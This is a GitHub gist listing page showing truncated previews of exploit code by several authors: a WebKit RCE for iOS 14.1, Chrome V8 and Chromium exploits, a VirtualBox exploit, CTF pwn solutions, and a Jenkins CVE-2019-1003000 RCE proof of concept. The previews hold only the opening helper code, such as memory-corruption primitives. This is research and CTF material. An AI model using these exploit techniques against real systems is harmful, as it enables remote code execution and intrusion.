Skip to content

Instantly share code, notes, and snippets.

View ducphanduyagentp's full-sized avatar
😸
writing happy exploits

Duc Phan ducphanduyagentp

😸
writing happy exploits
259 followers · 973 following
View GitHub Profile
@ujin5
ujin5 / fuck.js
Last active March 27, 2024 14:45
WebKit RCE on ios 14.1
function sleep( sleepDuration ){
var now = new Date().getTime();
while(new Date().getTime() < now + sleepDuration){ /* do nothing */ }
}
function gc() {
for (let i = 0; i < 0x10; i++) {
new ArrayBuffer(0x1000000);
}
}
let data_view = new DataView(new ArrayBuffer(8));
@hkraw
hkraw / chrome-v8-issue-1126249.js
Last active April 20, 2022 15:29
class Helpers {
constructor() {
this.cvt_buf = new ArrayBuffer(8);
this.cvt_f64a = new Float64Array(this.cvt_buf);
this.cvt_u64a = new BigUint64Array(this.cvt_buf);
this.cvt_u32a = new Uint32Array(this.cvt_buf);
}
ftoi(f) {
@r4j0x00
r4j0x00 / exploit.js
Created June 29, 2020 07:17
chromium-rce 0ctf quals 2020
function free(buf)
{
%ArrayBufferDetach(buf.buffer);
}
function u64(buf)
{
let x = BigInt(0);
for(i=0;i<8;++i)
x += BigInt(buf[i]) << BigInt(i*8);
@saelo
saelo / 3_years_of_attacking_javascript_engines.txt
Created October 27, 2019 16:04
3 Years of Attacking JavaScript Engines
|=-----------------------------------------------------------------------=|
|=-------------=[ 3 Years of Attacking JavaScript Engines ]=-------------=|
|=-----------------------------------------------------------------------=|
|=------------------------------=[ saelo ]=------------------------------=|
|=-----------------------------------------------------------------------=|
The following are some brief notes about the changes that have taken place
since the release of the "Attacking JavaScript Engines" paper [1]. In
general, no big conceptional changes have happened since. Mitigations have
been added to break some of the presented techniques and, as expected, a
@peternguyen93
peternguyen93 / virtualbox_3d_exp.py
Last active October 18, 2019 19:24
# Author : peternguyen93
import sys
sys.path.append('../') # back to vboxlib module
from vboxlib.hgcm import *
from vboxlib.chromium import *
from ctypes import *
'''
@ujin5
ujin5 / exploit.html
Created June 24, 2019 00:03
Google CTF Quals 2019 Monochromatic
<html>
<pre id='log'></pre>
<script src="mojo_bindings.js"></script>
<script src="third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>
<script src="being_creator_interface.mojom.js"></script>
<script src="food_interface.mojom.js"></script>
<script src="dog_interface.mojom.js"></script>
<script src="person_interface.mojom.js"></script>
<script src="cat_interface.mojom.js"></script>
<script>
@hama7230
hama7230 / exp.py
Created May 13, 2019 02:29
DEF CON CTF Qualifier 2019 speedrun-012
#!/usr/bin/env python
from pwn import *
context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
# context(terminal=['tmux', 'new-window']) # open new window
# libc = ELF('')
elf = ELF('./speedrun-012')
context(os='linux', arch=elf.arch)
context(log_level='debug') # output verbose log
@adamyordan
adamyordan / CVE-2019-1003000-Jenkins-RCE-POC.py
Last active July 29, 2019 09:29
CVE-2019-1003000-Jenkins-RCE-POC
#!/usr/bin/python
# Author: Adam Jordan
# Date: 2019-02-15
# Repository: https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
# PoC for: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative)
import argparse
import jenkins
@wmliang
wmliang / gist:36b3e6a8d59875cc9f2b20a952bb8890
Created December 30, 2018 22:38
35c3ctf pwndb exploit
#!/usr/bin/env python
#-*- coding: utf-8 -*-
from pwn import *
import re
import sys
import string
import itertools
# UAF in IndexCursor
@hama7230
hama7230 / exp.py
Created December 29, 2018 20:03
35C3 CTF collection
# import Collection
bytearray = ().__class__.__base__.__subclasses__()[5]
def p64(addr):
x = '{0:016x}'.format(addr)
return bytearray.fromhex(x)[::-1]
b = Collection.Collection({'1':0x1337})
libc_base = id(b) + 0xe27198 - 0x13e0dd0